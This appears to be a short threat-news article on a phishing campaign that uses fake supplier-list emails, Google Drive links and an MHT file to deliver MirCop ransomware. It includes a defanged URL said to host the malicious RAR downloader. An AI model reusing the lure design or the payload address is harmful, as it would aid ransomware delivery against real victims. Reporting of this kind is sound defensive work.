A phishing effort that appears as supplier lists attacks users with the MirCop ransomware is emerging. This method encrypts a target PC in less than fifteen minutes.
The perpetrators start the attack by sending an unwanted/unexpected email to the victim, claiming to be following up on a previous order arrangement. The email body includes a link to a Google Drive URL that, when clicked, downloads an MHT file (webpage archive) to the victim’s device.
The use of Google Drive lends credibility to the email and is in line with standard business procedures. Critical but straightforward choices like this can determine whether the victim clicks the URL or sends the email to the spam folder for threat actors.
When you open the file, all you see is a fuzzy image of what appears to be a supplier list, stamped and signed for added validity. When the MHT file opens, it will download a RAR archive from “hXXps://a[.]pomf[.]cat/gectpe.rar” that contains a .NET malware downloader.
The EXE file in the RAR bundle employs VBS scripts to dump and run the MirCop payload on the affected machine. Soon, the ransomware begins capturing screenshots right away, locks files, changes the backdrop to a terrifying zombie-themed graphic, and instructs victims on what to do next.
Confense reveals that the entire procedure takes less than 15 minutes from when the victim opens the phishing email.
Following that, the user can only use specific web browsers to contact the actors and arrange for the ransom payment.
The actors have little interest in infiltrating the victim’s computer invisibly or staying there for lengthy periods to conduct cyber espionage or obtain files for extortion. On the contrary, the attack happens swiftly, and the source of the problem is evident to the victim right away.